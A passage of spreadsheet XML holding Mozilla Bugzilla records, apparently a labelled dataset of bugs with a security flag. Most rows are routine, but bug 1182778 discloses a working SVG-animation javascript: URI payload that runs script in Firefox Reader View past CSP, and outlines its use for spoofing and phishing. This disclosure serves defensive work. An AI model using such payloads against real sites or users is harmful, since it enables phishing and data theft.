          <t>unspecified</t>
        </is>
      </c>
      <c r="L3884" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3884" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3884" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3884" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3884" t="inlineStr"/>
      <c r="Q3884" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3884" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3884" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3884" t="n">
        <v>1</v>
      </c>
      <c r="U3884" t="n">
        <v>0</v>
      </c>
      <c r="V3884" t="n">
        <v>6</v>
      </c>
      <c r="W3884" t="inlineStr">
        <is>
          <t>As part of re-organizing the bookmarks documentation (http://support.mozilla.com/tiki-view_forum_thread.php?comments_parentId=396465&amp;forumId=3) to better match what SUMO
visitors search, we need to review a draft article on the bookmarks toolbar.</t>
        </is>
      </c>
      <c r="X3884" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3885">
      <c r="A3885" t="n">
        <v>1182778</v>
      </c>
      <c r="B3885" t="inlineStr">
        <is>
          <t>2015-07-11 06:47:54 -0700</t>
        </is>
      </c>
      <c r="C3885" t="inlineStr">
        <is>
          <t>Passive script execution on about:reader via SVG animations (affects: Firefox, NoScript, CSP; impact: spoofing, phishing)</t>
        </is>
      </c>
      <c r="D3885" t="inlineStr">
        <is>
          <t>2024-05-30 09:03:07 -0700</t>
        </is>
      </c>
      <c r="E3885" t="n">
        <v>1</v>
      </c>
      <c r="F3885" t="n">
        <v>1</v>
      </c>
      <c r="G3885" t="n">
        <v>3</v>
      </c>
      <c r="H3885" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3885" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J3885" t="inlineStr">
        <is>
          <t>Reader Mode</t>
        </is>
      </c>
      <c r="K3885" t="inlineStr">
        <is>
          <t>39 Branch</t>
        </is>
      </c>
      <c r="L3885" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3885" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3885" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3885" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3885" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main42+]</t>
        </is>
      </c>
      <c r="Q3885" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3885" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3885" t="inlineStr">
        <is>
          <t>mozilla43</t>
        </is>
      </c>
      <c r="T3885" t="n">
        <v>1</v>
      </c>
      <c r="U3885" t="n">
        <v>0</v>
      </c>
      <c r="V3885" t="n">
        <v>63</v>
      </c>
      <c r="W3885" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0
Build ID: 20150629114848
Steps to reproduce:
Firefox offers a special mode for websites supposedly containing articles and text-heavy content that is called the "Reader View" (RV). This RV mode removes any potentially disturbing content from a website and attempts to show only the relevant details such as article headlines, article images and article body.
RV removes the ability to execute scripts (similarly to the RV offered by MS's Edge Browser). It does so by imposing a white-list on HTML content and stripping all that is not considered harmless. this includes script elements, JavaScript URIs, event handlers and more. 
The RV is being deployed from a special scope, about:reader. A URL of a website opened in RV will be "about:reader?url=`escape(%website-url%)`". While the URL is deployed from the about:reader scheme, the address bar hides that scheme prefix and shows the original page URL.
My tests have shown, that this white-list is too permissive and allows for elements to pass, even though they can execute JavaScript. Here is the full test case I was using (PHP file - for CSP headers' sake):
&lt;?php
header('Content-Security-Policy: default-src \'self\' ');
?&gt;&lt;html&gt;
&lt;head&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;h1&gt;Some Article&lt;/h1&gt;
&lt;article&gt;
&lt;h2&gt;Some headline&lt;/h2&gt;
&lt;p&gt;
	&lt;svg xmlns:xlink="http://www.w3.org/1999/xlink"&gt;
		&lt;a xlink:href&gt;
			&lt;circle r="999"&gt;&lt;/circle&gt;
			&lt;animate attributeName="xlink:href" from="javascript:alert(location)" to&gt;&lt;/animate&gt;
		&lt;/a&gt;
	&lt;/svg&gt;
	Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit, sed quia non numquam eius modi tempora incidunt ut labore et dolore magnam aliquam quaerat voluptatem. Ut enim ad minima veniam, quis nostrum exercitationem ullam corporis suscipit laboriosam, nisi ut aliquid ex ea commodi consequatur? Quis autem vel eum iure reprehenderit qui in ea voluptate velit esse quam nihil molestiae consequatur, vel illum qui dolorem eum fugiat quo voluptas nulla pariatur?
&lt;/p&gt;
&lt;p&gt;
	Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit, sed quia non numquam eius modi tempora incidunt ut labore et dolore magnam aliquam quaerat voluptatem. Ut enim ad minima veniam, quis nostrum exercitationem ullam corporis suscipit laboriosam, nisi ut aliquid ex ea commodi consequatur? Quis autem vel eum iure reprehenderit qui in ea voluptate velit esse quam nihil molestiae consequatur, vel illum qui dolorem eum fugiat quo voluptas nulla pariatur?
&lt;/p&gt;
&lt;/article&gt;
&lt;/body&gt;
&lt;/html&gt;
Once we load this URL from any web-origin, let's say http://example.com/test.php, the Firefox browser will show a small icon in the address bar, allowing a user to change into the RV. Once the RV is loaded, the page is shown with the customized minimal markup. 
Now, the interesting part is, that a certain dangerous part of the HTML from our test case above is not being removed:
&lt;svg xmlns:xlink="http://www.w3.org/1999/xlink"&gt;
	&lt;a xlink:href&gt;
		&lt;circle r="999"&gt;&lt;/circle&gt;
		&lt;animate attributeName="xlink:href" from="javascript:alert(location)" to&gt;&lt;/animate&gt;
	&lt;/a&gt;
&lt;/svg&gt;
What is shown with this test-case is a large black box (a clip of the SVG circle). Clicking this box will trigger an alert window, executing from about:reader. 
Note that this happens despite CSP headers being used on the original page. 
Further note that for example NoScript needs to white-list about:reader for the RV to be used at all. Once that is the case, NoScript does not prevent the script execution any much longer. This is not optimal and might require changes in both FF and NoScript to function as expected (e.g. allowing NoScript to apply the domain-trust to pages even when loaded in RV). 
I was thinking about possible exploitation of this  seemingly unwanted behaviour. And I think it can be exploited. let's assume the following scenario:
 * An attacker injects the malicious SVG on a website
 * The website uses CSP, users of modern browsers are not affected by the injection
 * A user now decides to use RV and watches the injected page
 * All of a sudden, the payload does work despite CSP
 * Naturally, we have no true XSS here but the attacker can still do a lot
  &gt; Use document.write to eliminate all UI elements of RV
  &gt; Fill the page with arbitrary other content, like a forged login form / other phishing frenzy
The core problem here is, that, even though the page in RV is deployed from about:reader, the user cannot distinguish between RV being active or not. The attacker can influence the entirety of HTML and write whatever into the page body, while the address bar is still showing the original URL without the about:reader prefix. Despite the domain using CSP, the attacker can phish with JavaScript and exfiltrate any data the user emits. And NoScript doesn't seem to help here.
To fix the issue, I'd recommend several things:
 * Fix the white-list and eliminate SVG's animate and set
 * Provide a better domain-based distinction for NoScript to work as expected
 * Optimize the info shown in the address bar to avoid spoofing attacks
 * Don't lose security headers on the way. CSP in regular mode should also work in RV
Actual results:
see above
Expected results:
see above</t>
        </is>
      </c>
      <c r="X3885" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3886">
      <c r="A3886" t="n">
        <v>162151</v>
      </c>
      <c r="B3886" t="inlineStr">
        <is>
          <t>2002-08-11 02:17:18 -0700</t>
        </is>
      </c>
      <c r="C3886" t="inlineStr">
        <is>
          <t>Fix page.cgi's method of finding templates</t>
        </is>
      </c>
      <c r="D3886" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:32 -0800</t>
        </is>
      </c>
      <c r="E3886" t="n">
        <v>1</v>
      </c>
      <c r="F3886" t="n">
        <v>1</v>
      </c>
      <c r="G3886" t="n">
        <v>4</v>
      </c>
      <c r="H3886" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3886" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3886" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K3886" t="inlineStr">
        <is>
          <t>2.17</t>
        </is>
      </c>
      <c r="L3886" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3886" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3886" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3886" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3886" t="inlineStr"/>
      <c r="Q3886" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3886" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3886" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T3886" t="n">
        <v>1</v>
      </c>
      <c r="U3886" t="n">
        <v>0</v>
      </c>
      <c r="V3886" t="n">
        <v>7</v>
      </c>
      <c r="W3886" t="inlineStr">
        <is>
          <t>Currently, page.cgi gets its template mappings from localconfig. This is bad,
because new installations don't pick up new mappings.
The new idea is to have a template/en/default/pages directory. This contains all
the pages page.cgi can serve.
page.cgi?id=foo.html
will look up "html" in the %contenttypes hash, send the appropriate content
type, then look for foo.html.tmpl in the pages directory.
Gerv</t>
        </is>
      </c>
      <c r="X3886" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3887">
      <c r="A3887" t="n">
        <v>1052202</v>
      </c>
      <c r="B3887" t="inlineStr">
        <is>
          <t>2014-08-11 17:18:20 -0700</t>
        </is>
      </c>
      <c r="C3887" t="inlineStr">
        <is>
          <t>Web Service module to update and delete components</t>
        </is>
      </c>
      <c r="D3887" t="inlineStr">
        <is>
          <t>2015-12-13 06:07:53 -0800</t>
        </is>
      </c>
      <c r="E3887" t="n">
        <v>1</v>
      </c>
      <c r="F3887" t="n">
        <v>1</v>
      </c>
      <c r="G3887" t="n">
        <v>4</v>
      </c>
      <c r="H3887" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3887" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3887" t="inlineStr">
        <is>
          <t>WebService</t>
        </is>
      </c>
      <c r="K3887" t="inlineStr">
        <is>
          <t>4.5</t>
        </is>
      </c>
      <c r="L3887" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3887" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3887" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3887" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3887" t="inlineStr"/>
      <c r="Q3887" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R3887" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3887" t="inlineStr">
        <is>
          <t>Bugzilla 6.0</t>
        </is>
      </c>
      <c r="T3887" t="n">
        <v>1</v>
      </c>
      <c r="U3887" t="n">
        <v>0</v>
      </c>
      <c r="V3887" t="n">
        <v>10</v>
      </c>
      <c r="W3887" t="inlineStr">
        <is>
          <t>Following on from bug 419568 ( Web Service module to create a component), we should allow a user to update and delete components via API calls too.</t>
        </is>
      </c>
      <c r="X3887" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3888">
      <c r="A3888" t="n">
        <v>1666568</v>
      </c>
      <c r="B3888" t="inlineStr">
        <is>
          <t>2020-09-22 10:54:46 -0700</t>
        </is>
      </c>
      <c r="C3888" t="inlineStr">
        <is>
          <t>WebAssembly threads crash on release assert for CurrentThreadCanAccessZone</t>
        </is>
      </c>
      <c r="D3888" t="inlineStr">
        <is>
          <t>2021-04-04 18:57:29 -0700</t>
        </is>
      </c>
      <c r="E3888" t="n">
        <v>1</v>
      </c>
      <c r="F3888" t="n">
        <v>1</v>
      </c>
      <c r="G3888" t="n">
        <v>3</v>
      </c>
      <c r="H3888" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3888" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3888" t="inlineStr">
        <is>
          <t>JavaScript: WebAssembly</t>
        </is>
      </c>
      <c r="K3888" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3888" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3888" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3888" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3888" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3888" t="inlineStr">
        <is>
          <t>[adv-main82+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q3888" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3888" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S3888" t="inlineStr">
        <is>
          <t>83 Branch</t>
        </is>
      </c>
      <c r="T3888" t="n">
        <v>1</v>
      </c>
      <c r="U3888" t="n">
        <v>0</v>
      </c>
      <c r="V3888" t="n">
        <v>25</v>
      </c>
      <c r="W3888" t="inlineStr">
        <is>
          <t>Created attachment 9177177
emscripten_test.zip
Example crash report: https://crash-stats.mozilla.org/report/index/a028e387-9af2-4489-a85d-6ede40200922
Top 10 frames of crashing thread:
```
0 libxul.so js::ObjectGroup::defaultNewGroup js/src/vm/ObjectGroup.cpp:541
1 libxul.so js::NewObjectWithGivenTaggedProto js/src/vm/JSObject.cpp:857
2 libxul.so js::SavedFrame::create js/src/vm/SavedStacks.cpp:563
3 libxul.so js::SavedStacks::getOrCreateSavedFrame js/src/vm/SavedStacks.cpp:1753
4 libxul.so js::SavedStacks::saveCurrentStack js/src/vm/SavedStacks.cpp:1307
5 libxul.so js::CaptureStack js/src/jsexn.cpp:221
6 libxul.so js::ErrorToException js/src/jsexn.cpp:331
7 libxul.so js::ReportErrorNumberVA js/src/vm/ErrorReporting.cpp:477
8 libxul.so JS_ReportErrorNumberASCII js/src/jsapi.cpp:4702
9 libxul.so js::ReportOverRecursed js/src/vm/JSContext.cpp:309
```
This started to crash consistently for us on Emscripten CI, which runs Firefox Dev edition, so this may be a regression that happened in the last few days.
The crashes almost always have
MOZ_RELEASE_ASSERT(CurrentThreadCanAccessZone(zone))
failing in them.
To reproduce in emscripten,
./tests/runner.py  browser.test_pthread_create
Attached is a zip of the build files, just run a webserver and browse to the HTML. (Will need either a COOP/COEP-enabled server, or to flip the "insecure" flag, happens either way.)</t>
        </is>
      </c>
      <c r="X3888" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3889">
      <c r="A3889" t="n">
        <v>14206</v>
      </c>
      <c r="B3889" t="inlineStr">
        <is>
          <t>1999-09-17 15:08:53 -0700</t>
        </is>
      </c>
      <c r="C3889" t="inlineStr">
        <is>
          <t>[Webshell] [top100] Crash-Printing large complex page</t>
        </is>
      </c>
      <c r="D3889" t="inlineStr">
        <is>
          <t>2000-01-19 16:28:38 -0800</t>
        </is>
      </c>
      <c r="E3889" t="n">
        <v>1</v>
      </c>
      <c r="F3889" t="n">
        <v>1</v>
      </c>
      <c r="G3889" t="n">
        <v>3</v>
      </c>
      <c r="H3889" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3889" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3889" t="inlineStr">
        <is>
          <t>Printing: Output</t>
        </is>
      </c>
      <c r="K3889" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3889" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3889" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N3889" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3889" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3889" t="inlineStr"/>
      <c r="Q3889" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3889" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3889" t="inlineStr">
        <is>
          <t>M14</t>
        </is>
      </c>
      <c r="T3889" t="n">
        <v>1</v>
      </c>
      <c r="U3889" t="n">
        <v>0</v>
      </c>
      <c r="V3889" t="n">
        <v>30</v>
      </c>
      <c r="W3889" t="inlineStr">
        <is>
          <t>When you try to print the Latin1 page, Apprunner will crash.
Steps of reproduce
1. Go to above URL
2. Select menu File|Print..
3. Ok to print
Apprunner will crash.
Tested 9-17 Win32 build.
Talkback Incident 13598655
Trigger Type:  Program Crash
 Trigger Reason:  Access violation
 Call Stack:    (Signature = nsWebShell::DoLoadURL 0ade4919)
 nsWebShell::DoLoadURL
[d:\builds\seamonkey\mozilla\webshell\src\nsWebShell.cpp, line 2112]
 nsWebShell::LoadURI
[d:\builds\seamonkey\mozilla\webshell\src\nsWebShell.cpp, line 2226]
 nsWebShell::LoadURL
[d:\builds\seamonkey\mozilla\webshell\src\nsWebShell.cpp, line 2324]
 nsWebShell::LoadURL
[d:\builds\seamonkey\mozilla\webshell\src\nsWebShell.cpp, line 1933]
 nsGfxTextControlFrame::PostCreateWidget
[d:\builds\seamonkey\mozilla\layout\html\forms\src\nsGfxTextControlFrame.cpp,
line 509]
 nsGfxTextControlFrame::Reflow
[d:\builds\seamonkey\mozilla\layout\html\forms\src\nsGfxTextControlFrame.cpp,
line 933]
 nsLineLayout::ReflowFrame
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsLineLayout.cpp, line 909]
 nsBlockFrame::ReflowInlineFrame
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsBlockFrame.cpp, line 3378]
 nsBlockFrame::DoReflowInlineFrames
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsBlockFrame.cpp, line 3268]
 nsBlockFrame::DoReflowInlineFramesAuto
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsBlockFrame.cpp, line 3215]
 nsBlockFrame::ReflowInlineFrames
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsBlockFrame.cpp, line 3164]
 nsBlockFrame::ReflowLine
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsBlockFrame.cpp, line 2429]
 nsBlockFrame::ReflowDirtyLines
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsBlockFrame.cpp, line 2171]
 nsBlockFrame::Reflow
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsBlockFrame.cpp, line 1417]
 nsAreaFrame::Reflow
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsAreaFrame.cpp, line 412]
 nsContainerFrame::ReflowChild
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsContainerFrame.cpp, line
462]
 nsTableCellFrame::Reflow
[d:\builds\seamonkey\mozilla\layout\html\table\src\nsTableCellFrame.cpp, line
604]
 nsContainerFrame::ReflowChild
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsContainerFrame.cpp, line
462]
 nsTableRowFrame::InitialReflow
[d:\builds\seamonkey\mozilla\layout\html\table\src\nsTableRowFrame.cpp, line
1047]
 nsTableRowFrame::Reflow
[d:\builds\seamonkey\mozilla\layout\html\table\src\nsTableRowFrame.cpp, line
1454]
 nsContainerFrame::ReflowChild
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsContainerFrame.cpp, line
462]
 nsTableRowGroupFrame::ReflowMappedChildren
[d:\builds\seamonkey\mozilla\layout\html\table\src\nsTableRowGroupFrame.cpp,
line 451]
 nsTableRowGroupFrame::Reflow
[d:\builds\seamonkey\mozilla\layout\html\table\src\nsTableRowGroupFrame.cpp,
line 1037]
 nsContainerFrame::ReflowChild
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsContainerFrame.cpp, line
462]
 nsTableFrame::ResizeReflowPass1
[d:\builds\seamonkey\mozilla\layout\html\table\src\nsTableFrame.cpp, line 2361]
 nsTableFrame::Reflow
[d:\builds\seamonkey\mozilla\layout\html\table\src\nsTableFrame.cpp, line 2222]
 nsContainerFrame::ReflowChild
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsContainerFrame.cpp, line
462]
 nsTableOuterFrame::Reflow
[d:\builds\seamonkey\mozilla\layout\html\table\src\nsTableOuterFrame.cpp, line
910]
 nsBlockReflowContext::ReflowBlock
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsBlockReflowContext.cpp,
line 230]
 nsBlockFrame::ReflowBlockFrame
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsBlockFrame.cpp, line 2952]
 nsBlockFrame::ReflowLine
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsBlockFrame.cpp, line 2381]
 nsBlockFrame::ReflowDirtyLines
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsBlockFrame.cpp, line 2171]
 nsBlockFrame::Reflow
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsBlockFrame.cpp, line 1417]
 nsBlockReflowContext::ReflowBlock
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsBlockReflowContext.cpp,
line 230]
 nsBlockFrame::ReflowBlockFrame
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsBlockFrame.cpp, line 2952]
 nsBlockFrame::ReflowLine
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsBlockFrame.cpp, line 2381]
 nsBlockFrame::ReflowDirtyLines
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsBlockFrame.cpp, line 2171]
 nsBlockFrame::Reflow
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsBlockFrame.cpp, line 1417]
 nsBlockReflowContext::ReflowBlock
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsBlockReflowContext.cpp,
line 230]
 nsBlockFrame::ReflowBlockFrame
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsBlockFrame.cpp, line 2952]
 nsBlockFrame::ReflowLine
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsBlockFrame.cpp, line 2381]
 nsBlockFrame::ReflowDirtyLines
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsBlockFrame.cpp, line 2171]
 nsBlockFrame::Reflow
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsBlockFrame.cpp, line 1417]
 nsAreaFrame::Reflow
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsAreaFrame.cpp, line 412]
 nsContainerFrame::ReflowChild
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsContainerFrame.cpp, line
462]
 nsPageFrame::Reflow
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsPageFrame.cpp, line 126]
 nsContainerFrame::ReflowChild
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsContainerFrame.cpp, line
462]
 nsSimplePageSequenceFrame::Reflow
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsSimplePageSequence.cpp,
line 243]
 nsContainerFrame::ReflowChild
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsContainerFrame.cpp, line
462]
 ViewportFrame::Reflow
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsViewportFrame.cpp, line
516]
 PresShell::InitialReflow
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsPresShell.cpp, line 872]
 DocumentViewerImpl::Print
[d:\builds\seamonkey\mozilla\layout\base\src\nsDocumentViewer.cpp, line 611]
 nsBrowserInstance::Print
[d:\builds\seamonkey\mozilla\xpfe\browser\src\nsBrowserInstance.cpp, line 1838]
 XPTC_InvokeByIndex
[d:\builds\seamonkey\mozilla\xpcom\reflect\xptcall\src\md\win32\xptcinvoke.cpp,
line 135]
 nsXPCWrappedNativeClass::CallWrappedMethod
[d:\builds\seamonkey\mozilla\js\src\xpconnect\src\xpcwrappednativeclass.cpp,
line 662]
 WrappedNative_CallMethod
[d:\builds\seamonkey\mozilla\js\src\xpconnect\src\xpcwrappednativejsops.cpp,
line 171]
 js_Invoke
[d:\builds\seamonkey\mozilla\js\src\jsinterp.c, line 655]
 js_Interpret
[d:\builds\seamonkey\mozilla\js\src\jsinterp.c, line 2229]
 js_Invoke
[d:\builds\seamonkey\mozilla\js\src\jsinterp.c, line 675]
 js_Interpret
[d:\builds\seamonkey\mozilla\js\src\jsinterp.c, line 2229]
 js_Invoke
[d:\builds\seamonkey\mozilla\js\src\jsinterp.c, line 675]
 js_InternalCall
[d:\builds\seamonkey\mozilla\js\src\jsinterp.c, line 748]
 JS_CallFunctionValue
[d:\builds\seamonkey\mozilla\js\src\jsapi.c, line 2664]
 nsJSEventListener::HandleEvent
[d:\builds\seamonkey\mozilla\dom\src\events\nsJSEventListener.cpp, line 112]</t>
        </is>
      </c>
      <c r="X3889" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3890">
      <c r="A3890" t="n">
        <v>1133909</v>
      </c>
      <c r="B3890" t="inlineStr">
        <is>
          <t>2015-02-17 11:55:50 -0800</t>
        </is>
      </c>
      <c r="C3890" t="inlineStr">
        <is>
          <t>Fix hazards revealed by adding in missing GCPointers</t>
        </is>
      </c>
      <c r="D3890" t="inlineStr">
        <is>
          <t>2016-07-02 10:11:16 -0700</t>
        </is>
      </c>
      <c r="E3890" t="n">
        <v>1</v>
      </c>
      <c r="F3890" t="n">
        <v>1</v>
      </c>
      <c r="G3890" t="n">
        <v>3</v>
      </c>
      <c r="H3890" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3890" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3890" t="inlineStr">
        <is>
          <t>JavaScript: GC</t>
        </is>
      </c>
      <c r="K3890" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3890" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3890" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3890" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3890" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3890" t="inlineStr">
        <is>
          <t>[adv-main37+]</t>
        </is>
      </c>
      <c r="Q3890" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3890" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3890" t="inlineStr">
        <is>
          <t>mozilla39</t>
        </is>
      </c>
      <c r="T3890" t="n">
        <v>1</v>
      </c>
      <c r="U3890" t="n">
        <v>0</v>
      </c>
      <c r="V3890" t="n">
        <v>20</v>
      </c>
      <c r="W3890" t="inlineStr">
        <is>
          <t>Bug 1132744 added in some new and renamed GCPointers, which revealed a few undetected hazards. I am not marking the dependency since currently bug 1132744 is public.</t>
        </is>
      </c>
      <c r="X3890" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3891">
      <c r="A3891" t="n">
        <v>590482</v>
      </c>
      <c r="B3891" t="inlineStr">
        <is>
          <t>2010-08-25 05:49:11 -0700</t>
        </is>
      </c>
      <c r="C3891" t="inlineStr">
        <is>
          <t>Brightspot testcases causes BusError when run with -Dverifyonly</t>
        </is>
      </c>
      <c r="D3891" t="inlineStr">
        <is>
          <t>2011-02-09 08:04:21 -0800</t>
        </is>
      </c>
      <c r="E3891" t="n">
        <v>0</v>
      </c>
      <c r="F3891" t="n">
        <v>0</v>
      </c>
      <c r="G3891" t="n">
        <v>6</v>
      </c>
      <c r="H3891" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3891" t="inlineStr">
        <is>
          <t>Tamarin Graveyard</t>
        </is>
      </c>
      <c r="J3891" t="inlineStr">
        <is>
          <t>Baseline JIT (CodegenLIR)</t>
        </is>
      </c>
      <c r="K3891" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3891" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3891" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3891" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3891" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3891" t="inlineStr">
        <is>
          <t>has-patch</t>
        </is>
      </c>
      <c r="Q3891" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3891" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3891" t="inlineStr">
        <is>
          <t>Q3 11 - Serrano</t>
        </is>
      </c>
      <c r="T3891" t="n">
        <v>1</v>
      </c>
